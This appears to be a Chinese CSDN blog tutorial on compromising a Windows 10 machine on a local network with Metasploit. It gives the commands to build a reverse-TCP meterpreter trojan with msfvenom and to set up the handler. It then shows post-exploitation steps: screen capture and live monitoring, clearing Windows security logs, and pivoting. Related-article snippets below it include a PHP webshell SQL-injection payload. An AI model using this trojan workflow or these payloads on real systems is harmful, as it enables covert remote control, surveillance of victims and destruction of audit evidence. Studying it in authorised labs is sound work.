利用msf进行内网的木马渗透详细教程

最新推荐文章于 2024-09-19 20:22:04 发布
最新推荐文章于 2024-09-19 20:22:04 发布
阅读量4.2k 收藏 23
点赞数 7
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52332592/article/details/127809786
版权

本文仅限学术交流,请勿用他人实践

本文通过kali系统进行内网渗透。主机 ip:172.20.10.14 靶机ip:172.20.10.3(win10) 

文章目录

  • 前言
  • 一 准备工作
  • 二 进行渗透
    • 1.开启服务:需要开启apache和postgresql服务
    • 2.制作木马文件,利用msf进行渗透
  • 总结 

前言

提示:以下是本篇文章正文内容,下面案例可供参考

一、准备工作 

我们要在主机安装kali系统,下载地址:Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

首先我们要将目标机和本机处于同一网段下,本次渗透是处在同一WiFi下的,我的系统是mac利用paralllel搭建的kali虚拟机。选择网络选择网络连接方式为WiFi。

 然后打开终端输入代码查询本机ip

ifconfig

 然后利用fping工具进行查询内网存活主机

fping -g 172.20.10.14

我们查询到了windows主机也就是本次渗透的靶机,其ip为172.20.10.3. 

二、进行渗透

1.开启服务:需要开启apache和postgresql服务

/etc/init.d/apache2 start
/etc/init.d/postgresql start

 

 

 

2.制作木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.14 LPORT=1777 -f exe >name.exe

然后制作好的exe文件就到了paralells里名叫name.exe的文件了。

我这个名字是叫hack.exe的

 然后打开终端,输入以下代码

msfconsole

 

然后输入以下指令

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 主机ip
set LPORT 生成木马程序时候的端口

 然后点击run,在靶机上面运行exe文件,测试过后,装有火绒的无法打开,其他的点击信任就可以。

 

 

这个是成功与靶机进行连接后的提示,我们就可以开始后渗透了。本文不详细介绍后渗透,只简单介绍几个小功能 

 

 输入代码screenshot可以截取当前靶机屏幕显示内容,以jpg形式保存在系统中

输入scrennshare可以对靶机进行实时监控模式

 

getpid    # 获取当前进程的pid
ps   # 查看当前活跃进程
kill <pid值>   # 杀死进程
clearev清除日志
clearev  # 清除windows中的应用程序日志、系统日志、安全日志
rdesktop 127.0.0.1:1111 # 需要输入用户名密码连接
rdesktop -u Administrator -p 123 127.0.0.1:1111 # -u 用户名 -p 密码
run autoroute -h # 查看帮助
run get_local_subnets # 查看目标内网网段地址

 

总结

以上就是今天要讲的内容,这是对内网进行渗透,下次将会讲述利用内网穿透msf进行远程控制,谢谢大家。

子的老父亲
关注
网络安全MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2950
内网渗透超级强悍
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
msf内网渗透
10-29
msf内网渗透
MSF的使用学习
最新发布
2302_80097039的博客
09-19 880
更新安装包信息;只检查,不更新(已安装的软件包是否有可用的更新,给出汇总报告)# 更新已安装的软件包,不删除旧包;# 升级包,删除旧包二、使用方法使用方法:1. 基础使用:#进入框架# 使用search命令查找相关漏洞# 使用use进入模块#使用info查看模块信息#设置攻击载荷#查看模块需要配置的参数#设置参数#攻击后渗透阶段 #后渗透阶段。
内网渗透工具MSF使用教程
CC__Faker的博客
04-01 2705
MSF介绍 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 常见指令 use[exploits/payloads/auxiliary] //指定一个模块并使其开始工作 show[exploits/payloads/auxiliary/options] //显
渗透工具MSF系列培训教程(共17课)10-17课
06-20
第1课:什么是Metasploit 第2课:如何安装Metasploit 第3课:如何更新MSF及其结构 第4课:msf用户接口及核心命令 第5课:Exploits模块 第6课:payloads模块 第7课:利用MSF攻击windows 第8课:三个模块作用 第9课:msfcli命令接口 第10课:msfweb命令接口 第11课:msfd命令接口 第12课:msfpayload和msfencode接口 第13课:MSF数据库后台命令 第14课:autopwn命令 第15课:meterpreter plyload 第16课:vncinject payload 第17课:MSF实战应用演示
MSF多层内网渗透全过程
include_voidmain的博客
08-16 2306
MSF多层内网渗透全过程
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 5044
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
MSF内网渗透实战
hackzkaq的博客
05-17 3932
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
cs linux内网渗透,记一次利用cs进行内网渗透的过程
weixin_29497981的博客
05-15 1143
记一次利用cs进行内网渗透的过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226域控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
msf mysql渗透_内网渗透(蚁剑+MSF
weixin_26901145的博客
01-27 1271
0x01 192.168.2.244攻击(1)使用的是之前本科实验室的同学在192.168.2.244/bigdata上留的一句话木马 (2)因为本人技术有限,只能采用上传后门的方式来拿到shell,好在蚁剑足已满足我上传木马的需求。在这一步只需要使用msf生成木马(使用theFatRat生成的木马稳定性不怎么滴,而且不能绕过火绒)。最后产生的木马效果最好如下:msf>msfvenom -p...
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试
【Web安全内网渗透研究之利用MSF和Impacket工具拿域控
HBohan的博客
10-23 1525
内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 【查看资料】 1、进去一看,典型的sql注入 2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>" into outfile 'C:
渗透测试实战 - 外网渗透内网穿透(超详细
HAKUNAMATATATTA的博客
02-18 8287
渗透测试实验,外网渗透内网穿透的详细操作过程以及内网代理和内网探测的方法
超实用!手把手教你如何用MSF进行渗透测试!
dianyan5615的博客
06-15 1093
  在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升;后续需要对系统进行全面的分析,搞清楚系统的用途;如果目标处于一个内网环境中,那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试,更全面地挖掘系统中存在的安全隐患。   本期安仔课堂,ISEC实验室的向老师为大家介绍如何使用MSF进...
MSF内网穿透
weixin_46686336的博客
11-08 486
MSF内网穿透
搭建内网靶场并用MSF进行内网穿透/渗透实验
Cwillchris的博客
10-17 4092
实验名称:利用MSF打穿内网 实验人:XX 实验日期:2021.10.16 实验目的:利用MSF进行内网渗透 实验拓扑: 实验环境: 所用机器 网络类型 IP 默认网关 DNS 攻击机:kali NAT 172.16.12.30/24 172.16.12.2 114.114.114.114
利用Metasploit Framework(msf进行内网(域)渗透
初学者L_言的博客
07-03 5765
只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!! 内网进行端口扫描:use auxiliary/scanner/portscan/tcp use exploit/windows/smb/ms08_067_netapi
MSF(Metasploit Framework)详细教程
qq_41245301的博客
12-28 3498
Metasploit 是一个开源的渗透测试开源软件,也是一个逐步发展成熟的漏洞研究与渗透测试代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境,2009年10月,Metasploit项目被一家渗透测试技术领域的知名安全公司Rapid7所收购。Rapid7公司随后与2010年10月推出了Metasploit Express 和Pro商业版本。优点: 模块化,灵活框架,界面友好,简单易用,代码安全
使用Armitage与MSF进行自动化渗透测试教程
在这个课程中,重点讲解了如何利用Armitage工具结合Metasploit Framework (MSF)进行自动化集成渗透测试。Armitage是一个图形用户界面,能够简化MSF的复杂操作,使得渗透测试过程更加直观和高效。 首先,你需要准备...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值